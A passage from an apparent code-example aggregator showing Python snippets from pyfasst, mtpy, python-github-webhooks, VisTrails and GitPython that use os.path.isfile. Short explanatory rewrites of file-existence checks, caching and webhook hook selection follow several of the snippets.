Nfft=Nfft, t0=0.0,\
analysisWindowType=analysisWindow)
transform.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((transform.datalen_init / 2.
- transform.time_stamps)**2)
if verbose>1: print midindex, transform.transfo.shape, WF0.shape
WF0[:,fundamentalFrequency * perF0] = np.abs(
transform.transfo[:,midindex])**2
# del mqt.transfo # maybe needed but might slow down even more...
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##print odgds.shape, odgd.shape
if verbose>10: # super debug
import matplotlib.pyplot as plt
plt.ion()
plt.figure(111)
plt.clf()
plt.imshow(np.log(np.abs(transform.transfo)**2))
raw_input('ayayay')
for chirpNumber in np.arange(perF0 - 1):
F2 = F0Table[fundamentalFrequency] \
* (2 ** ((chirpNumber + 1.0) * depthChirpInSemiTone \
/ (12.0 * (perF0 - 1.0))))
# F0 is the mean of F1 and F2.
F1 = 2.0 * F0Table[fundamentalFrequency] - F2
odgd, odgdSpec = \
generate_ODGD_spec_chirped(F1, F2, Fs, \
Ot=Ot, \
lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0)
transform.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((transform.datalen_init / 2.
- transform.time_stamps)**2)
WF0[:,fundamentalFrequency * perF0 + chirpNumber + 1] = \
np.abs(transform.transfo[:,midindex]) ** 2
# del mqt.transfo # idem
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##hybt.computeHybrid(data=odgds)
##midindex = np.argmin((lengthWindow / 2. + lengthWindow
## * np.vstack(np.arange(numberElementsInWF0))
## - hybt.time_stamps)**2, axis=1)
##if verbose>1: print midindex
##WF0 = np.abs(hybt.spCQT[:,midindex]) ** 2
np.savez(filename, F0Table=F0Table, WF0=WF0, tft=transform)
return F0Table, WF0, transform #, hybt, odgds
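This variant repeats the isfile-based caching of Example 80, and the commented-out length check ("print len(filename)") hints at a practical problem: encoding every parameter in the filename can make it unwieldy or exceed filesystem limits. One possible workaround, suggested here rather than taken from pyfasst, is to hash the sorted parameter string into a short key while still using os.path.isfile for the cache lookup:

import hashlib
import os

def cache_filename(prefix, **params):
    # Hash the sorted parameter string so the cache name stays short and stable.
    key = '_'.join('%s-%s' % (k, params[k]) for k in sorted(params))
    digest = hashlib.sha1(key.encode('utf-8')).hexdigest()[:16]
    return '%s_%s.npz' % (prefix, digest)

fname = cache_filename('wf0_tr', minF0=80, maxF0=800, stepNotes=4, Ot=0.5)
already_computed = os.path.isfile(fname)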
0
Example 89
Project: mtpy Source File: calibration.py
def calibrate_file(filename, outdir, instrument, instrument_amplification,
logger, gain, dipole, stationname, channel, latitude,
longitude, elevation, offset = 0 ):
"""
Calibrate data from one given file and store the output to another file.
If the channel is not given explicitly, it's taken from the filename suffix.
E-field values will be given in microvolt/meter.
B-field values are given in nanotesla.
input:
- data file name
- foldername for saving the output
- instrument type
- instrument amplification factor
- data logger type
- logger gain factor
- station name
- channel
"""
time_axis = None
if not instrument.lower() in list_of_instruments:
raise MTex.MTpyError_inputarguments('instrument type not known')
if not logger.lower() in list_of_loggers:
raise MTex.MTpyError_inputarguments('data logger type not known')
if not op.isfile(filename):
raise MTex.MTpyError_inputarguments('data file not existing')
infile_base = op.basename(filename)
try:
data_in = np.loadtxt(filename)
except:
raise MTex.MTpyError_inputarguments('cannot read data file')
data_out = copy.copy(data_in)
#read in first line of input file, checking, if header line exists
FH = open(filename,'r')
firstline = FH.readline().strip()
FH.close()
if np.size(data_in.shape) > 1:
if data_in.shape[1] > 1:
#at least 2 columns - assume the first is time, the second is data - ignore any further columns
time_axis = data_in[:,0]
data_in = data_in[:,1]
if not op.isdir(outdir):
try:
os.makedirs(outdir)
except:
raise MTex.MTpyError_inputarguments('output directory is not '
'existing and cannot be generated')
if channel == None:
channel = filename[-2:].lower()
if not channel in list_of_channels:
raise MTex.MTpyError_inputarguments('wrong channel specification')
field = channel[0]
#print 'channel:...........',channel, field
#print 'read file',filename ,'wrote file...'
#return
#separate way for B and E fields here:
if field == 'e':
if dipole <= 1:
print 'Check dipole length value ! - It is highly improbable to '\
'have a 1 meter dipole!!'
answer = raw_input('\t\tContinue anyway? [y/N] \n')
if not answer[0].lower() == 'y':
sys.exit('Calibration process interrupted by user input!')
instrument = 'electrodes'
logger = logger.lower()
if logger == 'elogger':
if not type(gain) in [float, int]:#list_of_elogger_gain_factors:
raise MTex.MTpyError_inputarguments('invalid gain for elogger:'
' {0}'.format(gain))
#instrument_amplification = dict_of_efield_amplification[logger]
outfile_data = elogger_e_field(data_in, gain, dipole,
instrument_amplification)
elif logger == 'edl':
if not type(gain) in [float, int, str]:
raise MTex.MTpyError_inputarguments('invalid gain for EDL: '
'{0}'.format(gain))
#instrument_amplification = dict_of_efield_amplification[logger]
if type(gain) == str:
EDLgain = dict_of_EDL_gain_factors[gain]
else:
EDLgain = float(gain)
outfile_data = EDL_e_field(data_in, EDLgain, dipole,
instrument_amplification)
dataunit ='microvoltpermeter'
#B-field part
elif field == 'b':
instrument = instrument.lower()
if not instrument in list_of_bfield_instruments:
raise MTex.MTpyError_inputarguments('invalid instrument for B-'
'field measurements')
logger = logger.lower()
if not logger in list_of_bfield_loggers:
raise MTex.MTpyError_inputarguments('invalid logger for B-field'
' measurements')
#instrument_amplification = 1.
#calibration_factor = dict_of_calibration_factors_volt2nanotesla[instrument]
if logger == 'edl':
if not type(gain) in [float,int,str]:
raise MTex.MTpyError_inputarguments('invalid gain: '
'{0}'.format(gain))
if type(gain) == str:
EDLgain = dict_of_EDL_gain_factors[gain]
else:
EDLgain = float(gain)
if instrument == 'fluxgate' and channel == 'bz':
instrument_amplification *= dict_of_bz_instrument_amplification[logger]
outfile_data = EDL_b_field(data_in, EDLgain, instrument,
instrument_amplification)
dataunit = 'nanotesla'
newbasename = '{0}_{1}.{2}'.format(op.splitext(infile_base)[0], dataunit,
infile_base.split('.')[-1].lower())
#set up output file
outfile = op.join(outdir, newbasename)
additional_header_info = ' {0} {1:02.5f} {2:03.5f} {3:.1f} \n'.format(
dataunit, latitude, longitude, elevation)
if firstline[0][0] == '#':
newfirstline = firstline + additional_header_info
else:
newfirstline = '# {0} {1} {2}'.format(stationname, channel,
additional_header_info)
if time_axis != None:
data_out[:,1] = outfile_data
else:
data_out = outfile_data
Fout = open(outfile,'w')
Fout.write(newfirstline)
np.savetxt(Fout,data_out,fmt='%.8e')
Fout.close()
print 'read file',filename ,' -> wrote file %s'%(outfile)
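Stripped of the instrument-specific branches, the function follows one guard-clause pattern: reject a missing input file, create the output directory on demand, then write the scaled data. A minimal sketch under those assumptions (calibrate and factor are illustrative names, not part of mtpy):

import os
import numpy as np

def calibrate(infile, outdir, factor):
    # Refuse to start if the input data file is not present on disk.
    if not os.path.isfile(infile):
        raise IOError('data file does not exist: {0}'.format(infile))
    # Create the output directory lazily if it is missing.
    if not os.path.isdir(outdir):
        os.makedirs(outdir)
    data = np.loadtxt(infile) * factor
    outfile = os.path.join(outdir, os.path.basename(infile))
    np.savetxt(outfile, data, fmt='%.8e')
    return outfile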
0
Example 90
Project: python-github-webhooks Source File: webhooks.py
@application.route('/', methods=['GET', 'POST'])
def index():
"""
Main WSGI application entry.
"""
path = normpath(abspath(dirname(__file__)))
# Only POST is implemented
if request.method != 'POST':
abort(501)
# Load config
with open(join(path, 'config.json'), 'r') as cfg:
config = loads(cfg.read())
hooks = config.get('hooks_path', join(path, 'hooks'))
# Allow Github IPs only
if config.get('github_ips_only', True):
src_ip = ip_address(
u'{}'.format(request.remote_addr) # Fix stupid ipaddress issue
)
whitelist = requests.get('https://api.github.com/meta').json()['hooks']
for valid_ip in whitelist:
if src_ip in ip_network(valid_ip):
break
else:
abort(403)
# Enforce secret
secret = config.get('enforce_secret', '')
if secret:
# Only SHA1 is supported
header_signature = request.headers.get('X-Hub-Signature')
if header_signature is None:
abort(403)
sha_name, signature = header_signature.split('=')
if sha_name != 'sha1':
abort(501)
# HMAC requires the key to be bytes, but data is string
mac = hmac.new(str(secret), msg=request.data, digestmod=sha1)
# Python prior to 2.7.7 does not have hmac.compare_digest
if hexversion >= 0x020707F0:
if not hmac.compare_digest(str(mac.hexdigest()), str(signature)):
abort(403)
else:
# What compare_digest provides is protection against timing
# attacks; we can live without this protection for a web-based
# application
if not str(mac.hexdigest()) == str(signature):
abort(403)
# Implement ping
event = request.headers.get('X-GitHub-Event', 'ping')
if event == 'ping':
return dumps({'msg': 'pong'})
# Gather data
try:
payload = loads(request.data)
except:
abort(400)
# Determining the branch is tricky, as it only appears for certain event
# types and at different levels
branch = None
try:
# Case 1: a ref_type indicates the type of ref.
# This is true for create and delete events.
if 'ref_type' in payload:
if payload['ref_type'] == 'branch':
branch = payload['ref']
# Case 2: a pull_request object is involved. This covers pull_request and
# pull_request_review_comment events.
elif 'pull_request' in payload:
# This is the TARGET branch for the pull-request, not the source
# branch
branch = payload['pull_request']['base']['ref']
elif event in ['push']:
# Push events provide a full Git ref in 'ref' and not a 'ref_type'.
branch = payload['ref'].split('/')[2]
except KeyError:
# If the payload structure isn't what we expect, we'll live without
# the branch name
pass
# All current events have a repository, but some legacy events do not,
# so let's be safe
name = payload['repository']['name'] if 'repository' in payload else None
meta = {
'name': name,
'branch': branch,
'event': event
}
logging.info('Metadata:\n{}'.format(dumps(meta)))
# Possible hooks
scripts = []
if branch and name:
scripts.append(join(hooks, '{event}-{name}-{branch}'.format(**meta)))
if name:
scripts.append(join(hooks, '{event}-{name}'.format(**meta)))
scripts.append(join(hooks, '{event}'.format(**meta)))
scripts.append(join(hooks, 'all'))
# Check permissions
scripts = [s for s in scripts if isfile(s) and access(s, X_OK)]
if not scripts:
return ''
# Save payload to a temporary file
osfd, tmpfile = mkstemp()
with fdopen(osfd, 'w') as pf:
pf.write(dumps(payload))
# Run scripts
ran = {}
for s in scripts:
proc = Popen(
[s, tmpfile, event],
stdout=PIPE, stderr=PIPE
)
stdout, stderr = proc.communicate()
ran[basename(s)] = {
'returncode': proc.returncode,
'stdout': stdout,
'stderr': stderr,
}
# Log errors if a hook failed
if proc.returncode != 0:
logging.error('{} : {} \n{}'.format(
s, proc.returncode, stderr
))
# Remove the temporary file
remove(tmpfile)
info = config.get('return_scripts_info', False)
if not info:
return ''
output = dumps(ran, sort_keys=True, indent=4)
logging.info(output)
return output
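The hook selection above reduces to filtering candidate paths with isfile() and access(..., X_OK) so only real, executable scripts are run. A small sketch of that filter, with hypothetical names runnable_hooks and hooks_dir:

import os

def runnable_hooks(hooks_dir, candidates):
    # Keep only candidates that exist as regular files and are executable.
    paths = (os.path.join(hooks_dir, name) for name in candidates)
    return [p for p in paths if os.path.isfile(p) and os.access(p, os.X_OK)]

# Example usage with the same specificity order as the webhook handler.
scripts = runnable_hooks('/srv/hooks', ['push-myrepo-master', 'push-myrepo', 'push', 'all'])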
0
Example 91
Project: mtpy Source File: configfile.py
def read_survey_configfile(filename):
"""
Read in a survey configuration file and return a dictionary.
Input config file must contain station names as section headers!
The output dictionary keys are station names (capitalised),
the values are (sub-)dictionaries. The configuration file must contain
sections for all stations, each containing all mandatory keywords:
- latitude (deg)
- longitude (deg)
- elevation (in meters)
- sampling_interval (in seconds)
- station_type (MT, (Q)E, (Q)B)
Not mandatory, but recommended
- declination (in degrees, positive to East) - this is set to '0.0', if omitted
Depending on the type of station the following entries are required.
E-field recorded:
- E_logger_type ('edl'/'elogger'/'qel')
- E_logger_gain (factor/gain-level)
- E_instrument_type ('electrodes'/'dipole')
- E_instrument_amplification (applied amplification factor)
- E_Xaxis_azimuth (degrees)
- E_Xaxis_length (in meters)
- E_Yaxis_azimuth (degrees)
- E_Yaxis_length (in meters)
B-field recorded:
- B_logger_type ('edl'/'qel_blogger')
- B_logger_gain (factor/gain level)
- B_instrument_type ('coil(s)', 'fluxgate')
- B_instrument_amplification (applied amplification factor)
- B_Xaxis_azimuth (degrees)
- B_Yaxis_azimuth (degrees)
A global section can be used to include parameters for all stations.
The name of the section must be one of:
global/main/default/general
"""
error_counter = 0
#generate config parser instance
configobject = ConfigParser.ConfigParser()
#check, if file is present
if not op.isfile(filename):
raise MTex.MTpyError_inputarguments( 'File does not'
' exist: {0}'.format(filename) )
# try to parse file - exit, if not a config file
try:
configobject.read(filename)
except:
raise MTex.MTpyError_inputarguments( 'File is not a '
'proper configuration file: {0}'.format(filename) )
#obtain dict of dicts containing the input file's sections (station names)
#excludes DEFAULT section and key-value pairs without section header
configobject_dict = configobject._sections
#initialise the output dictionary
config_dict = {}
#loop over the sections (stations) of the config file
for station in configobject_dict:
#read in the sub-dictionary for the current station - bringing all keys
#to lowercase!
temp_dict_in = dict((k.lower(),v.lower())
for k, v in configobject_dict[station].items())
#initialise output sub-dictionary for the current station
stationdict = temp_dict_in
#stationnames are uppercase in MTpy
stationname = station.upper()
if stationname in ['GLOBAL','MAIN','DEFAULT','GENERAL']:
stationname = 'GLOBAL'
stationdict['station'] = stationname
#add the station's sub-dictionary to the config dictionary
config_dict[stationname] = stationdict
# Check if a global section is present
if config_dict.has_key('GLOBAL'):
globaldict = config_dict['GLOBAL']
else:
#set defaults for location
globaldict={}
# for i in ['latitude', 'longitude', 'elevation']:
# #skip if values are present
# if i in globaldict.keys() or i[:3] in globaldict.keys():
# continue
# #otherwise set defaults
# globaldict[i] = 0
#remove other general sections to avoid redundancy
for i in ['MAIN','DEFAULT','GENERAL']:
if config_dict.has_key(i):
dummy = config_dict.pop(i)
# Re-loop to check for each station whether the required keywords are present
# and, if not, whether they can be pulled from the global section
#============================================================
# local function definition
def fromglobals(key,stationdict,globaldict):
"""
Check if stationdict contains key.
If not search for key in global dict and add it to station dict.
Return if global dict is not defined.
Return True if key was present in either dictionary, False if not.
"""
if key in stationdict.keys():
return True, stationdict.get(key)
if globaldict is None or len(globaldict) == 0:
return False, None
if key in globaldict:
stationdict[key] = globaldict[key]
return True,globaldict.get(key)
return False, None
#============================================================
for station in sorted(config_dict):
#do not alter the global section
if station == 'GLOBAL':
continue
stationdict = config_dict[station]
#check for presence of all mandatory keywords for the current station
#case insensitive - allow for short forms 'sampling', 'lat', 'lon', and 'elev'
for idx,req_keyword in enumerate(list_of_required_keywords):
shortform = list_of_required_keywords_short[idx]
try:
found = False
#import ipdb
#ipdb.set_trace()
if fromglobals(req_keyword,stationdict,globaldict)[0] is False:
#try short form instead
found,value = fromglobals(shortform,stationdict,globaldict)
#print shortform,value
if found is True:
stationdict[req_keyword] = value
else:
found = True
if found is False:
print 'Station {0} - keyword {1} missing'.format(stationname,
req_keyword)
error_counter += 1
raise Exception
if req_keyword in ['elevation','latitude', 'longitude']:
#check format of lat/lon - convert to degrees, if given in
#(deg,min,sec)-triple; assert correct format
value = stationdict[req_keyword]
try:
new_value = MTft._assert_position_format(req_keyword,value)
except:
raise MTex.MTpyError_config_file('Error - wrong '
'coordinate format for station {0}'.format(stationname))
stationdict[req_keyword] = new_value
except:
raise
print 'Missing information on station {0} in config file'\
' - setting default (dummy) value'.format(station)
stationdict[req_keyword] = list_of_keyword_defaults_general[idx]
#to avoid duplicates remove the now obsolete short form from
#the station dictionary
dummy = stationdict.pop(shortform,None)
if not stationdict['station_type'] in list_of_station_types:
raise MTex.MTpyError_config_file( 'Station type not valid' )
if stationdict['station_type'] in ['mt','e']:
#check for required electric field parameters - not done for QEL loggers yet
for req_keyword in list_of_efield_keywords:
if req_keyword.lower() in temp_dict_in.keys():
stationdict[req_keyword.lower()] = \
temp_dict_in[req_keyword.lower()].lower()
else:
print 'Station {0} - keyword {1} missing'.format(stationname,
req_keyword)
error_counter += 1
continue
_validate_dictionary(stationdict,dict_of_allowed_values_efield)
if stationdict['station_type'] in ['mt','b']:
#check for required magnetic field parameters
for req_keyword in list_of_bfield_keywords:
if req_keyword.lower() in temp_dict_in.keys():
stationdict[req_keyword.lower()] = \
temp_dict_in[req_keyword.lower()].lower()
else:
print 'Station {0} - keyword {1} missing'.format(stationname,
req_keyword)
error_counter += 1
continue
_validate_dictionary(stationdict,dict_of_allowed_values_bfield)
#re-loop for setting up correct remote reference station information :
#if rem.ref. station key is present, its information must be contained
#in the same config file!
for station in config_dict.iterkeys():
stationdict = config_dict[station]
if not stationdict.has_key('rr_station'):
continue
#stationdict['rr_station'] = None
stationdict['rr_station_latitude'] = None
stationdict['rr_station_longitude'] = None
stationdict['rr_station_elevation'] = None
rem_station = stationdict['rr_station']
try:
#check, if values are contained in dict
float(stationdict['rr_station_latitude'] )
float(stationdict['rr_station_longitude'])
float(stationdict['rr_station_elevation'])
except:
try:
#check for shortened form
stationdict['rr_station_latitude'] = float(
stationdict['rr_station_lat'] )
stationdict['rr_station_longitude'] = float(
stationdict['rr_station_lon'] )
stationdict['rr_station_elevation'] = float(
stationdict['rr_station_ele'] )
except:
try:
#read from other config dict entry
stationdict['rr_station_latitude'] = \
config_dict[rem_station]['latitude']
stationdict['rr_station_longitude'] = \
config_dict[rem_station]['longitude']
stationdict['rr_station_elevation'] = \
config_dict[rem_station]['elevation']
except:
#if finally failed to read rr_station info,\
#set rr_station back to None
stationdict['rr_station'] = None
stationdict['rr_station_latitude'] = None
stationdict['rr_station_longitude'] = None
stationdict['rr_station_elevation'] = None
#check consistency of coordinates, if rr_station is present
if stationdict['rr_station'] != None:
try:
stationdict['rr_station_latitude'] = \
MTft._assert_position_format(
'latitude',stationdict['rr_station_latitude'])
stationdict['rr_station_longitude'] = \
MTft._assert_position_format(
'longitude',stationdict['rr_station_longitude'])
stationdict['rr_station_elevation'] = \
MTft._assert_position_format(
'elevation',stationdict['rr_station_elevation'])
except:
print 'Problem with remote reference station ({0}) -'\
' remote reference ({1}) coordinates invalid -'\
' remote reference set to None'.format(station,
stationdict['rr_station'])
stationdict['rr_station'] = None
stationdict['rr_station_latitude'] = None
stationdict['rr_station_longitude'] = None
stationdict['rr_station_elevation'] = None
if error_counter != 0:
print 'Could not read all mandatory sections and options'\
' in config file - found {0} errors - check configuration'\
' file before continuing!'.format(error_counter)
answer = 5
while not answer in ['y','n']:
answer = raw_input('\n\tDo you want to continue anyway? (y/n)')
try:
answer = answer.strip().lower()[0]
except:
continue
if answer == 'n':
print
sys.exit()
print
return config_dict
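Before any parsing, the function verifies that the configuration file exists; without that guard, ConfigParser.read() would silently return an empty configuration for a missing path. A minimal sketch of that guard (read_config is an illustrative name, not part of MTpy):

import os
try:
    import configparser                      # Python 3
except ImportError:
    import ConfigParser as configparser      # Python 2

def read_config(path):
    # Fail early with a clear message instead of parsing a missing file.
    if not os.path.isfile(path):
        raise IOError('configuration file does not exist: {0}'.format(path))
    parser = configparser.ConfigParser()
    parser.read(path)
    return dict((section, dict(parser.items(section)))
                for section in parser.sections())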
0
Example 92
Project: VisTrails Source File: init.py
def class_dict(base_module, node):
"""class_dict(base_module, node) -> dict
Returns the class dictionary for the module represented by node and
with base class base_module"""
class_dict_ = {}
def update_dict(name, callable_):
if class_dict_.has_key(name):
class_dict_[name] = callable_(class_dict_[name])
elif hasattr(base_module, name):
class_dict_[name] = callable_(getattr(base_module, name))
else:
class_dict_[name] = callable_(None)
def guarded_SimpleScalarTree_wrap_compute(old_compute):
# This builds the scalar tree and makes it cacheable
def compute(self):
self.is_cacheable = lambda *args, **kwargs: True
old_compute(self)
self.vtkInstance.BuildTree()
return compute
def guarded_SetFileName_wrap_compute(old_compute):
# This checks for the presence of file in VTK readers
def compute(self):
# Skips the check if it's a vtkImageReader or vtkPLOT3DReader, because
# it has other ways of specifying files, like SetFilePrefix for
# multiple files
if any(issubclass(self.vtkClass, x)
for x in
[vtk.vtkBYUReader,
vtk.vtkImageReader,
vtk.vtkPLOT3DReader,
vtk.vtkDICOMImageReader,
vtk.vtkTIFFReader]):
old_compute(self)
return
if self.has_input('SetFileName'):
name = self.get_input('SetFileName')
elif self.has_input('SetFile'):
name = self.get_input('SetFile').name
else:
raise ModuleError(self, 'Missing filename')
if not os.path.isfile(name):
raise ModuleError(self, 'File does not exist')
old_compute(self)
return compute
def compute_SetDiffuseColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetDiffuseColorWidget(self, color):
self.vtkInstance.SetDiffuseColor(color.tuple)
return call_SetDiffuseColorWidget
def compute_SetAmbientColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetAmbientColorWidget(self, color):
self.vtkInstance.SetAmbientColor(color.tuple)
return call_SetAmbientColorWidget
def compute_SetSpecularColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetSpecularColorWidget(self, color):
self.vtkInstance.SetSpecularColor(color.tuple)
return call_SetSpecularColorWidget
def compute_SetColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetColorWidget(self, color):
self.vtkInstance.SetColor(color.tuple)
return call_SetColorWidget
def compute_SetEdgeColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetEdgeColorWidget(self, color):
self.vtkInstance.SetEdgeColor(color.tuple)
return call_SetEdgeColorWidget
def compute_SetBackgroundWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackgroundWidget(self, color):
self.vtkInstance.SetBackground(color.tuple)
return call_SetBackgroundWidget
def compute_SetBackground2Widget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackground2Widget(self, color):
self.vtkInstance.SetBackground2(color.tuple)
return call_SetBackground2Widget
def compute_SetVTKCell(old_compute):
if old_compute != None:
return old_compute
def call_SetRenderWindow(self, cellObj):
if cellObj.cellWidget:
self.vtkInstance.SetRenderWindow(cellObj.cellWidget.mRenWin)
return call_SetRenderWindow
def compute_SetTransferFunction(old_compute):
# This sets the transfer function
if old_compute != None:
return old_compute
def call_SetTransferFunction(self, tf):
tf.set_on_vtk_volume_property(self.vtkInstance)
return call_SetTransferFunction
def compute_SetPointData(old_compute):
if old_compute != None:
return old_compute
def call_SetPointData(self, pd):
self.vtkInstance.GetPointData().ShallowCopy(pd)
return call_SetPointData
def compute_SetCellData(old_compute):
if old_compute != None:
return old_compute
def call_SetCellData(self, cd):
self.vtkInstance.GetCellData().ShallowCopy(cd)
return call_SetCellData
def compute_SetPointIds(old_compute):
if old_compute != None:
return old_compute
def call_SetPointIds(self, point_ids):
self.vtkInstance.GetPointIds().SetNumberOfIds(point_ids.GetNumberOfIds())
for i in xrange(point_ids.GetNumberOfIds()):
self.vtkInstance.GetPointIds().SetId(i, point_ids.GetId(i))
return call_SetPointIds
def guarded_Writer_wrap_compute(old_compute):
# The behavior for vtkWriter subclasses is to call Write()
# If the user sets a name, we will create a file with that name
# If not, we will create a temporary file from the file pool
def compute(self):
old_compute(self)
fn = self.vtkInstance.GetFileName()
if not fn:
o = self.interpreter.filePool.create_file(suffix='.vtk')
self.vtkInstance.SetFileName(o.name)
else:
o = File()
o.name = fn
self.vtkInstance.Write()
self.set_output('file', o)
return compute
for var in dir(node.klass):
# Everyone that has a Set.*FileName should have a Set.*File port too
if set_file_name_pattern.match(var):
def get_compute_SetFile(method_name):
def compute_SetFile(old_compute):
if old_compute != None:
return old_compute
def call_SetFile(self, file_obj):
getattr(self.vtkInstance, method_name)(file_obj.name)
return call_SetFile
return compute_SetFile
update_dict('_special_input_function_' + var[:-4],
get_compute_SetFile(var))
if hasattr(node.klass, 'SetFileName'):
# ... BUT we only want to check existence of filenames on
# readers. VTK is nice enough to be consistent with names, but
# this is brittle..
if node.klass.__name__.endswith('Reader'):
if not node.klass.__name__.endswith('TiffReader'):
update_dict('compute', guarded_SetFileName_wrap_compute)
if hasattr(node.klass, 'SetRenderWindow'):
update_dict('_special_input_function_SetVTKCell',
compute_SetVTKCell)
#color gui wrapping
if hasattr(node.klass, 'SetDiffuseColor'):
update_dict('_special_input_function_SetDiffuseColorWidget',
compute_SetDiffuseColorWidget)
if hasattr(node.klass, 'SetAmbientColor'):
update_dict('_special_input_function_SetAmbientColorWidget',
compute_SetAmbientColorWidget)
if hasattr(node.klass, 'SetSpecularColor'):
update_dict('_special_input_function_SetSpecularColorWidget',
compute_SetSpecularColorWidget)
if hasattr(node.klass, 'SetEdgeColor'):
update_dict('_special_input_function_SetEdgeColorWidget',
compute_SetEdgeColorWidget)
if hasattr(node.klass, 'SetColor'):
update_dict('_special_input_function_SetColorWidget',
compute_SetColorWidget)
if (issubclass(node.klass, vtk.vtkRenderer) and
hasattr(node.klass, 'SetBackground')):
update_dict('_special_input_function_SetBackgroundWidget',
compute_SetBackgroundWidget)
if (issubclass(node.klass, vtk.vtkRenderer) and
hasattr(node.klass, 'SetBackground2')):
update_dict('_special_input_function_SetBackground2Widget',
compute_SetBackground2Widget)
if issubclass(node.klass, vtk.vtkWriter):
update_dict('compute', guarded_Writer_wrap_compute)
if issubclass(node.klass, vtk.vtkScalarTree):
update_dict('compute', guarded_SimpleScalarTree_wrap_compute)
if issubclass(node.klass, vtk.vtkVolumeProperty):
update_dict('_special_input_function_SetTransferFunction',
compute_SetTransferFunction)
if issubclass(node.klass, vtk.vtkDataSet):
update_dict('_special_input_function_SetPointData',
compute_SetPointData)
update_dict('_special_input_function_SetCellData',
compute_SetCellData)
if issubclass(node.klass, vtk.vtkCell):
update_dict('_special_input_function_SetPointIds',
compute_SetPointIds)
return class_dict_
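guarded_SetFileName_wrap_compute is essentially a decorator: it checks the configured filename with os.path.isfile before delegating to the original compute. A self-contained sketch of the same idea, with hypothetical names require_existing_file and read_points:

import os

def require_existing_file(func):
    # Check the filename argument before running the wrapped reader.
    def wrapper(filename, *args, **kwargs):
        if not os.path.isfile(filename):
            raise ValueError('File does not exist: {0}'.format(filename))
        return func(filename, *args, **kwargs)
    return wrapper

@require_existing_file
def read_points(filename):
    with open(filename) as fh:
        return fh.read().split()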
0
Example 93
Project: GitPython Source File: test_refs.py
@with_rw_repo('0.1.6')
def test_head_reset(self, rw_repo):
cur_head = rw_repo.head
old_head_commit = cur_head.commit
new_head_commit = cur_head.ref.commit.parents[0]
cur_head.reset(new_head_commit, index=True) # index only
assert cur_head.reference.commit == new_head_commit
self.failUnlessRaises(ValueError, cur_head.reset, new_head_commit, index=False, working_tree=True)
new_head_commit = new_head_commit.parents[0]
cur_head.reset(new_head_commit, index=True, working_tree=True) # index + wt
assert cur_head.reference.commit == new_head_commit
# paths - make sure we have something to do
rw_repo.index.reset(old_head_commit.parents[0])
cur_head.reset(cur_head, paths="test")
cur_head.reset(new_head_commit, paths="lib")
# hard resets with paths don't work, it's all or nothing
self.failUnlessRaises(GitCommandError, cur_head.reset, new_head_commit, working_tree=True, paths="lib")
# we can do a mixed reset, and then checkout from the index though
cur_head.reset(new_head_commit)
rw_repo.index.checkout(["lib"], force=True)
# now that we have a writable repo, change the HEAD reference - it's
# like git-reset --soft
heads = rw_repo.heads
assert heads
for head in heads:
cur_head.reference = head
assert cur_head.reference == head
assert isinstance(cur_head.reference, Head)
assert cur_head.commit == head.commit
assert not cur_head.is_detached
# END for each head
# detach
active_head = heads[0]
curhead_commit = active_head.commit
cur_head.reference = curhead_commit
assert cur_head.commit == curhead_commit
assert cur_head.is_detached
self.failUnlessRaises(TypeError, getattr, cur_head, "reference")
# tags are references, hence we can point to them
some_tag = rw_repo.tags[0]
cur_head.reference = some_tag
assert not cur_head.is_detached
assert cur_head.commit == some_tag.commit
assert isinstance(cur_head.reference, TagReference)
# put HEAD back to a real head, otherwise everything else fails
cur_head.reference = active_head
# type check
self.failUnlessRaises(ValueError, setattr, cur_head, "reference", "that")
# head handling
commit = 'HEAD'
prev_head_commit = cur_head.commit
for count, new_name in enumerate(("my_new_head", "feature/feature1")):
actual_commit = commit + "^" * count
new_head = Head.create(rw_repo, new_name, actual_commit)
assert new_head.is_detached
assert cur_head.commit == prev_head_commit
assert isinstance(new_head, Head)
# already exists, but has the same value, so it's fine
Head.create(rw_repo, new_name, new_head.commit)
# it's not fine with a different value
self.failUnlessRaises(OSError, Head.create, rw_repo, new_name, new_head.commit.parents[0])
# force it
new_head = Head.create(rw_repo, new_name, actual_commit, force=True)
old_path = new_head.path
old_name = new_head.name
assert new_head.rename("hello").name == "hello"
assert new_head.rename("hello/world").name == "hello/world"
assert new_head.rename(old_name).name == old_name and new_head.path == old_path
# rename with force
tmp_head = Head.create(rw_repo, "tmphead")
self.failUnlessRaises(GitCommandError, tmp_head.rename, new_head)
tmp_head.rename(new_head, force=True)
assert tmp_head == new_head and tmp_head.object == new_head.object
logfile = RefLog.path(tmp_head)
assert osp.isfile(logfile)
Head.delete(rw_repo, tmp_head)
# deletion removes the log as well
assert not osp.isfile(logfile)
heads = rw_repo.heads
assert tmp_head not in heads and new_head not in heads
# force on deletion testing would be missing here, code looks okay though ;)
# END for each new head name
self.failUnlessRaises(TypeError, RemoteReference.create, rw_repo, "some_name")
# tag ref
tag_name = "5.0.2"
TagReference.create(rw_repo, tag_name)
self.failUnlessRaises(GitCommandError, TagReference.create, rw_repo, tag_name)
light_tag = TagReference.create(rw_repo, tag_name, "HEAD~1", force=True)
assert isinstance(light_tag, TagReference)
assert light_tag.name == tag_name
assert light_tag.commit == cur_head.commit.parents[0]
assert light_tag.tag is None
# tag with tag object
other_tag_name = "releases/1.0.2RC"
msg = "my mighty tag\nsecond line"
obj_tag = TagReference.create(rw_repo, other_tag_name, message=msg)
assert isinstance(obj_tag, TagReference)
assert obj_tag.name == other_tag_name
assert obj_tag.commit == cur_head.commit
assert obj_tag.tag is not None
TagReference.delete(rw_repo, light_tag, obj_tag)
tags = rw_repo.tags
assert light_tag not in tags and obj_tag not in tags
# remote deletion
remote_refs_so_far = 0
remotes = rw_repo.remotes
assert remotes
for remote in remotes:
refs = remote.refs
# If a HEAD exists, it must be deleted first. Otherwise it might
# end up pointing to an invalid ref if the ref was deleted before.
remote_head_name = "HEAD"
if remote_head_name in refs:
RemoteReference.delete(rw_repo, refs[remote_head_name])
del(refs[remote_head_name])
# END handle HEAD deletion
